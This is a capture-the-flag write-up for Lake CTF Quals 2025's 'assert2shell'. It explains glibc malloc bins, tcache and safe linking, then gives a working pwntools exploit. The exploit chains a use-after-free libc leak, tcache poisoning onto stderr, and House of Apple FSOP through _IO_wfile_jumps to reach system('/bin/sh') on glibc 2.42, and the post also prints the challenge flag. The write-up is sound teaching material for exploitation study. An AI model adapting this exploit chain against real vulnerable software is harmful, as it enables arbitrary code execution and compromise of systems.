Post

assert2shell

Assert2Shell

This challenge is from Lake Ctf Quals 2025

Understanding how Malloc works

Before explaining how the exploit works, we first need to understand a few things about malloc

Bins

Bins from malloc are linked lists, also called free lists, that contain heap memory chunks. These linked lists are divided into multiple types:

  • Unsorted Bin (Doubly linked list)
  • Large Bin (Doubly Linked Lists)
  • Small Bin (Doubly Linked Lists)
  • Fast Bin (Singly Linked Lists)
  • Tcache Bin (Singly Linked Lists)

As we can see in the source code of the glibc, the bins are just arrays of free lists. Fast Bin has its own array of free lists while Unsorted Bin, Small Bin, and Large Bin share the same array. This is because they are doubly linked lists. We are going to discuss Tcache Bin a little bit later.

The following structure is from glibc source code and shows how these bins are stored:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
struct malloc_state {
    /* Serialize access.  */
    mutex_t mutex;
    // Should we have padding to move the mutex to its own cache line?

    #if THREAD_STATS
    /* Statistics for locking. Only used if THREAD_STATS is defined.  */
    long stat_lock_direct, stat_lock_loop, stat_lock_wait;
    #endif

    /* The maximum chunk size to be eligible for fastbin */
    INTERNAL_SIZE_T  max_fast;    /* low 2 bits used as flags */

    /* Fastbins */
    mfastbinptr      fastbins[NFASTBINS];

    /* Base of the topmost chunk -- not otherwise kept in a bin */
    mchunkptr        top;

    /* The remainder from the most recent split of a small request */
    mchunkptr        last_remainder;

    /* Normal bins packed as described above */
    mchunkptr        bins[NBINS * 2];
} 

Unsorted Bin has just 1 free list while Small bin and Large bin have 62 and 63 free lists.Unsorted Bin, Small Bin, and Large Bin use doubly linked lists because they support chunk coalescing(merging).When two adjacent free chunks in memory are located in the same bin, they can be merged into a single larger chunk. The doubly linked structure facilitates efficient removal and merging of these contiguous chunks.The reason Fast Bin is a singly linked list is that the chunks inside fast bin are not merging therefore we don t need a pointer to the previous chunk.But Fast bin can suffer from memory fragmentation this happens when lots of small free chunks can t be merged into a big chunk.A way in which a consolidation(merging) is triggered on Fast bin can be by calling free on a chunk memory bigger than FASTBIN_CONSOLIDATION_THRESHOLD which is around 64 kb.When consolidation on fast bin happens the created chunk is put in Unsorted bin.Also Fast bin is designed for small size chunks the maximum chunk size for Fast bin is 160 bytes.Small bin maximum chunk size is 504 bytes.While Unsorted Bin and Large bin don t have a limit for the maximum chunk size.

The Unsorted bin has a special use case,every chunk that is freed is put first in the Unsorted Bin if the chunk is bigger than what fast bin can support.Chunks move out of the Unsorted Bin and into their permanent Small or Large Bins when the allocator iterates through the Unsorted Bin to fulfill a memory request, and the current chunk is not the chosen fit.

Another important thing to understand is that Unsorted bin, Small bin and Large Bin free lists are circular linked lists,so we can t have a null previous pointer or a null next pointer.Also when a chunk is freed the allocator will consider that the data is no longer needed and will put bk(previous pointer) pointer and fd(next pointer) into the body of the chunk.

My Family Photo

Top Chunk

Now you may ask yourself if bins are used to return freed chunks,what happens when we do our first malloc or when we request a chunk of which size can t be find in any of the bins;in this case the chunk will be returned from Top Chunk.

The Top Chunk represents the contiguous available memory at the border of the heap is obtained by using sbrk syscall. This region is lazily initialized during the first call to malloc. The allocator maintains a top pointer for Top Chunk to track the starting address of this free memory. When an allocation request cannot be met by existing bins, the Top Chunk is sliced; one part is returned to the user, and the pointer is updated to reflect the remaining free space.

All the componenets discussed above are managed by the Main Arena struct. The Main Arena is a global instance of struct malloc_state (we saw it previously in glibc source code).Unlike the chunks,which reside in the dynamic heap memory,the Main Arena struct resides in the .data section of the libc.so.This means that leaking a pointer in the Main Arena allows us to compute the libc base address.

TCache Bin

Tcache Bin was added starting with glibc 2.27 .Tcache Bin is also an array that contain multiple singly linked lists up to 64 and each list contains maximum 7 chunks.The smallest free list can contain chunks of maximum 32 bytes while the biggest free list can store chunks up to 1040 bytes.Unlike the Main Arena the Tcache Bin is stored in Thread Local Storage.The name tcache comes from Thread Local Cache. It was designed to fix the speed issue of Main Arena: when multiple threads try to use the Main Arena at the same time, the Arena gets ‘locked’ for safety. This forces other threads to wait in line until the lock is freed.The tcache avoids this problem entirely. Because each tcache belongs exclusively to one specific thread, it does not need to be locked. This allows threads to grab memory instantly without waiting for others.

Previously we said that a chunk is put first in Unsorted Bin(if the size is bigger than what Fast bin can support)this is no longer true from the moment the tcache was added if a chunk is smaller than 1040 bytes and tcache is not full the chunk will be placed in tcache bin otherwise will be placed in unsorted bin.

Modern glibc includes protections against Tcache Poisoning, a technique where attackers overwrite the fd pointer to redirect malloc to an arbitrary address. Introduced in glibc 2.32, Safe Linking prevents this by obfuscating the fd pointers. Instead of storing raw memory addresses, the allocator XORs the pointer with a shift of the chunk’s own address. If an attacker blindly overwrites the fd pointer with a target address, the allocator’s decryption process effectively mangles it into an invalid address, causing a crash rather than an arbitrary write.

Tcache struct definition and visual representation

1
2
3
4
5
6
7
8
9
10
11
typedef struct tcache_perthread_struct
{
uint16_t counts[TCACHE_MAX_BINS];
tcache_entry *entries[TCACHE_MAX_BINS];
}
tcache_perthread_struct; typedef struct tcache_entry
{
struct tcache_entry *next;
/* This field exists to detect double frees. */
uintptr_t key;
} tcache_ent

Tcache

The exact way tcache is encrypting the fd pointer is by shifting by 12 to the right the address that will be put in the linked list and then xoring the resulting value from the shift with the previous address that is in linked list,in the case that this is the first chunk put in the linked list the value with which will be xored is 0.

glibc macro:

1
2
3
4
5
/padefine PROTECT_PTR(pos, ptr) \

((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))

define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)

where pos represent the address that will be added in the linked list and ptr the previous address.

This section skipped a lot of the malloc implementation details for not making the write up too long,if you want to learn more about malloc check out the resources from the end of the write up

New Mitigation Challenge

protection

Running the given binary will prompt us with a menu in which we can select to allocate,view,free or edit the content of a chunk.

menu

If we choose to allocate it will ask to give the index and the size that we want the chunk to have and data that will be put in the chunk

allocate

The free option will ask for the index of the chunk that we want to free while edit will ask for the index and the new data that we want to add in the chunk.And view will show us the content of the chunk.

free_edit

view

Playing a little bit with the program we will see that it has a use after free,when calling the free on the index of a chunk it will free the pointer but it will not null out the pointer inside that index.

By dissasembling the program we can see that it has a variable named nops initialized with 9 that is verified after every operation that is greater or equal than 0.If it will become smaller than 0 it will trigger an assert that will stop the program.

chal

nops

Libc Leak

If we remember from the previous part we know that allocating a chunk bigger than 1040 will go to Unsorted bin which is in libc,so with this we can allocate the first chunk with let s say 1100 and we need to allocate another chunk to prevent consolidation.After we allocated these two chunks we can free the chunk with the size of 1100,this chunk will go in Unsorted bin the allocator will overwrite the content of the chunk with the pointer to the head of the Unsorted bin free list.Knowing that the program has a use after free, we can use the view function to leak the Unsorted bin address.And by using pwndbg we can see the libc base address and compute the offset of the libc base and unsorted bin leak which is 0x211b20.

Tcache Poisoning

Now that we know the libc base address we can now compute the address of stderr struct _IO_2_1_stderr_,we are going to learn later why we use stderr address ,now let s focus on tcache poisoning.Remember when previously we said that we allocated two chunks,the size of the second chunk will be 0x150(336 bytes) this is because we are going to need it for when we free this chunk to go into the Tcache bin.After we free this chunk we can use again the view function to leak the encrypted address that is because when a chunk is the last or the single node in the tcache bin the address inside the body of the chunk will be the encrypted address of the chunk itself.Because we know that this is the first chunk inside Tcache bin we can decrypt easily the real address.That is because remembering the encryption formula of Tcache chunks:

Chunk_Address = (Chunk_address >> 12) ^ (Previous_Chunk_Address)

For our first chunk that go in the Tcache the Previous_Chunk_Address will be 0 so the real address will be Encrypted_Value(from view function ) « 12. We decrypted this address because we are going to need it when trying to encrypt the stderr struct address.(Malloc will try to decrypt every chunk that comes from Tcache so if we don t encrypt the address,when malloc will try to decrypt it it will give a mangled value and not our address) The formula for encrypting the stderr struct _IO_2_1_stderr_ will be:

(_IO_2_1_stderr_  » 12) ^ First_Chunk_Address

Now knowing this we can use edit function to put this encrypted address in the body of the first chunk. Next we are going to call allocate with index 0 for getting our first chunk out of the tcache list.And we are going to call again the allocate function with index 1 to get our _IO_2_1_stderr_ address,and now we have write primitive on stderr struct.The problem with what we did until now is that we have 9 function call and for every call the nops will decrease by 1 so at the next function call assert will be triggered and the program will close limiting our exploit possibilities.

House of Apple

Until now you’ve probably wondered what happens once we’ve exhausted our 9 operations. This is where loading _IO_2_1_stderr_ into tcache becomes crucial, as it grants us write primitive to it. The solution involves using File Stream Oriented Programming (FSOP). First, let’s understand how streams are implemented.

Stdin,stdout and stderr are represented in memory as structs,all of three share the same struct format named _IO_FILE_plus:

1
2
3
4
5
struct _IO_FILE_plus
{
  FILE file;
  const struct _IO_jump_t *vtable;
};

While struct _IO_FILE_plus defines the layout of a single stream (like stdin), these structures do not exist in isolation. Inside the nested file member (which is struct _IO_FILE), there is a specific field called _chain. This pointer links all open streams together into a singly linked list, allowing the system to traverse them when needed for example exit() will traverse the streams to flush them.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
struct _IO_FILE
{
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */

  /* The following pointers correspond to the C++ streambuf protocol. */
  char *_IO_read_ptr;	/* Current read pointer */
  char *_IO_read_end;	/* End of get area. */
  char *_IO_read_base;	/* Start of putback+get area. */
  char *_IO_write_base;	/* Start of put area. */
  char *_IO_write_ptr;	/* Current put pointer. */
  char *_IO_write_end;	/* End of put area. */
  char *_IO_buf_base;	/* Start of reserve area. */
  char *_IO_buf_end;	/* End of reserve area. */

  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
  int _flags2:24;
  /* Fallback buffer to use when malloc fails to allocate one.  */
  char _short_backupbuf[1];
  __off_t _old_offset; /* This used to be _offset but it's too small.  */

  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

When trying to exploit streams we are speciafically interested in the vtable pointer at the end of the _IO_FILE_plus.This pointer is used when trying to execute helper function for the stream.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
struct _IO_jump_t
{
    JUMP_FIELD(size_t, __dummy);
    JUMP_FIELD(size_t, __dummy2);
    JUMP_FIELD(_IO_finish_t, __finish);
    JUMP_FIELD(_IO_overflow_t, __overflow);
    JUMP_FIELD(_IO_underflow_t, __underflow);
    JUMP_FIELD(_IO_underflow_t, __uflow);
    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
    /* showmany */
    JUMP_FIELD(_IO_xsputn_t, __xsputn);
    JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
    JUMP_FIELD(_IO_seekoff_t, __seekoff);
    JUMP_FIELD(_IO_seekpos_t, __seekpos);
    JUMP_FIELD(_IO_setbuf_t, __setbuf);
    JUMP_FIELD(_IO_sync_t, __sync);
    JUMP_FIELD(_IO_doallocate_t, __doallocate);
    JUMP_FIELD(_IO_read_t, __read);
    JUMP_FIELD(_IO_write_t, __write);
    JUMP_FIELD(_IO_seek_t, __seek);
    JUMP_FIELD(_IO_close_t, __close);
    JUMP_FIELD(_IO_stat_t, __stat);
    JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
    JUMP_FIELD(_IO_imbue_t, __imbue);
};

From all of this functions we are interested in the overflow function.The reason we target overflow,is because when a program is closing for example because of exit ,is first making sure that it doesn t have any data sitting in buffers that hasn t been written to the file or screen.If it has data in streams it calls overflow.This can be seen by looking in the glibc source code in the function _IO_flush_all_lockp first it verifies with fp->_mode <= 0 that data in streams is not wide data(utf characters) than it verifies if the fp->_IO_write_ptr is bigger than fp->_IO_write_base it means thre is data between write base and write ptr.

1
2
3
4
5
6
7
8
9
10
      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
	   || (_IO_vtable_offset (fp) == 0
	       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
				    > fp->_wide_data->_IO_write_base))
#endif
	   )
	  && _IO_OVERFLOW (fp, EOF) == EOF)
	result = EOF;

Because of circuit logic from C the if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base) we force to execute the IO_Overflow.

Now the way we can use this to exploit is that if we get the address of a stream struct like _IO_2_1_stderr_(or stdout,stdin) we can compute offset where the overflow function entry is in the vtable and overwrite it with the address of system function.And we also need to zero out both write_ptr and write_base to make the condition false.And also inside the flags from the beginning of the FILE struct we need to overwrite those with sh; because those are going to arrive in rdi.

The problem for this challenge is that we can t use this,the reason why is because the binary use a modern glibc more exactly glibc 2.42(latest glibc).And because of this we are going to use the House of Apple exploit chain.

Modern glibc enforces a boundary check (vtable verification). It ensures that the vtable pointer always points to the read-only section of libc where the official vtables reside. If we point it anywhere else (like a heap buffer or the system function), the program detects the anomaly and terminate it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# define _IO_JUMPS_FUNC(THIS) \
  (IO_validate_vtable                                                   \
   (*(struct _IO_jump_t **) ((void *) &_IO_JUMPS_FILE_plus (THIS)	\
			     + (THIS)->_vtable_offset)))


IO_validate_vtable (const struct _IO_jump_t *vtable)
{
  uintptr_t ptr = (uintptr_t) vtable;
  uintptr_t offset = ptr - (uintptr_t) &__io_vtables;
  if (__glibc_unlikely (offset >= IO_VTABLES_LEN))
    /* The vtable pointer is not in the expected section.  Use the
       slow path, which will terminate the process if necessary.  */
    _IO_vtable_check ();
  return vtable;
}

The way we can bypass this check as described in House of Apple is by using the wide data vtable _IO_wfile_jumps.For this specific vtable pointer glibc don t have boundary checks.In our program we have a write primitive on _IO_2_1_stderr_ with this we can overwrite the IO_jump_t pointer with _IO_wfile_jumps and because _IO_wfile_jumps is in the boundary the glibc will not terminate the program.We also need to set the mode of the struct as wide_data mode and make sure that we put the lock address as well.The next thing we need to do is to put in the offset where the overflow function is the address of the system function and in the flags to put the sh; in order to pop a shell.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
exe = context.binary = ELF("./chal")
libc = ELF("./libc.so.6")

def allocate(idx,size,data):
    p.sendlineafter(b'> ',b'1')
    p.sendlineafter(b'idx?: ',str(idx).encode())
    p.sendlineafter(b'size?: ',str(size).encode())
    p.sendlineafter(b'data?: ',data)

def free(idx):
    p.sendlineafter(b'> ',b'3')
    p.sendlineafter(b'idx?: ',str(idx).encode())

def view(idx):
    p.sendlineafter(b'> ',b'2')
    p.sendlineafter(b'idx?: ',str(idx).encode())

def edit(idx,data):
    p.sendlineafter(b'> ',b'4')
    p.sendlineafter(b'idx?: ',str(idx).encode())
    p.sendlineafter(b'new data?: ',data)

p = remote("chall.polygl0ts.ch", 6242)
allocate(0,1100,b'a'*100)
allocate(1,0x150,b'b'*20)

free(0)
view(0)
p.recvuntil(b'meow: ')
libc.address = u64(p.recv(8)) - 0x211b20
print("libc address " + hex(libc.address))

stderr_addr = libc.sym['_IO_2_1_stderr_']
print("_IO_2_1_stderr_ " + hex(stderr_addr))

free(1)
view(1)
p.recvuntil(b'meow: ')
fd_current_pointer = u64(p.recv(8)) << 12
print("fd_pointer " + hex(fd_current_pointer))

encrypted_fd = (fd_current_pointer >> 12) ^ (stderr_addr)
edit(1,p64(encrypted_fd))

allocate(0,0x150,b'a'*10)


fake_vtable_offset = 0x10

wide_data_loc = stderr_addr - 0x10

fs = flat(
    {
        fake_vtable_offset + 0x68: libc.sym['system'],

        0x00: b'  sh'.ljust(8, b'\x00'),
        0x88: libc.address + 2176896,
        0xA0: wide_data_loc,
        0xC0: p32(-1, sign="signed"),
        0xD0: stderr_addr + fake_vtable_offset,

        0xD8: libc.sym['_IO_wfile_jumps'],
    },
    filler=b'\x00'
)

allocate(0, 0x150, fs)
p.interactive()

An explanation of offsets inside flat:

0x00 - flags are going to arrive in rdi so we overwrite them with sh;

0x88 - the address of the lock

0xa0 - the offset from where the _IO_wide_data struct starts

0xc0 - sets the stream on wide char

0xd0 - the offset on which the vtable of function starts

0xd8 - the IO_jump_t vtable that we overwrite

But there is still a question how is this triggered in House of Apple there is described that exit() is used,but our program calls assert than aborts.But looking in the definition of the __assert_fail,we can see that is a macro for __assert_fail_base which is a function defined in this way:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
__assert_fail_base (const char *fmt, const char *assertion, const char *file,
		    unsigned int line, const char *function)
{
  char *str;

#ifdef FATAL_PREPARE
  FATAL_PREPARE;
#endif

  int total = __asprintf (&str, fmt,
			  __progname, __progname[0] ? ": " : "",
			  file, line,
			  function ? function : "", function ? ": " : "",
			  assertion);
  if (total >= 0)
    {
      /* Print the message.  */
      (void) __fxprintf (NULL, "%s", str);
      (void) fflush (stderr);

      total = ALIGN_UP (total + sizeof (struct abort_msg_s) + 1,
			GLRO(dl_pagesize));
      struct abort_msg_s *buf = __mmap (NULL, total, PROT_READ | PROT_WRITE,
					MAP_ANON | MAP_PRIVATE, -1, 0);
      if (__glibc_likely (buf != MAP_FAILED))
	{
	  buf->size = total;
	  strcpy (buf->msg, str);
	  __set_vma_name (buf, total, " glibc: assert");

	  /* We have to free the old buffer since the application might
	     catch the SIGABRT signal.  */
	  struct abort_msg_s *old = atomic_exchange_acquire (&__abort_msg, buf);

	  if (old != NULL)
	    __munmap (old, old->size);
	}

      free (str);
    }
  else
    {
      /* At least print a minimal message.  */
      char linebuf[INT_STRLEN_BOUND (int) + sizeof ":: "];
      struct iovec v[9];
      int i = 0;

#define WS(s) (v[i].iov_len = strlen (v[i].iov_base = (void *) (s)), i++)

      if (__progname)
	{
	  WS (__progname);
	  WS (": ");
	}

      WS (file);
      v[i++] = (struct iovec) {.iov_base = linebuf,
	.iov_len = sprintf (linebuf, ":%d: ", line)};

      if (function)
	{
	  WS (function);
	  WS (": ");
	}

      WS ("Assertion `");
      WS (assertion);
      /* We omit the '.' here so that the assert tests can tell when
         this code path is taken.  */
      WS ("' failed\n");

      (void) __writev (STDERR_FILENO, v, i);
    }

  abort ();
}

You might think that fflush is the one that will trigger the exploit chain but in reality __fxprintf is triggering the exploit.The reason why is because assert it needs first to print the message before flushing and calling abort. To keep this writeup concise, I’ll provide a list of the functions that trigger the exploit rather than walking through each one in detail from the glibc source.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
  __assert_fail
    __assert_fail_base
        __fxprintf
            __vfxprintf
                _IO_vfprintf_internal (macro as vfprintf)
                    Xprintf (resolved as __printf_buffer_to_file)
                        _IO_sputn (macro)
                            _IO_XSPUTN (macro)
                                |
                                | NOTE: Vtable at offset 0xD8 was modified to point to _IO_wfile_jumps.
                                | Therefore, _IO_XSPUTN computes the address relative to _IO_wfile_jumps,
                                | diverting execution from standard IO to Wide IO.
                                |
                                _IO_wfile_xsputn
                                    _IO_wdefault_xsputn
                                        __woverflow
                                            _IO_OVERFLOW
                                                |
                                                | NOTE: Resolved to _IO_wfile_overflow because of the 
                                                | modified vtable mentioned above.
                                                |
                                                _IO_wfile_overflow
                                                    _IO_wdoallocbuf
                                                        _IO_WDOALLOCATE (macro)
                                                            __doallocate (macro for vtable slot)
                                                                |
                                                                | NOTE: Normally calls _IO_wfile_doallocate (malloc).
                                                                | We overwrote this slot to point to system().
                                                                |
                                                                system("/bin/sh")

EPFL{waittt_IT_IS_EASIER_ON_THE_NEW_ONE!?!?----tcache_count_check,_you_will_not_be_missed.}

Resources used:

ir0nstone.gitbook.io/notes/heap/the-tcache

sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc

www.secquest.co.uk/white-papers/tcache-heap-exploitation

www.roderickchan.cn/zh-cn/house-of-apple-%E4%B8%80%E7%A7%8D%E6%96%B0%E7%9A%84glibc%E4%B8%ADio%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95-1/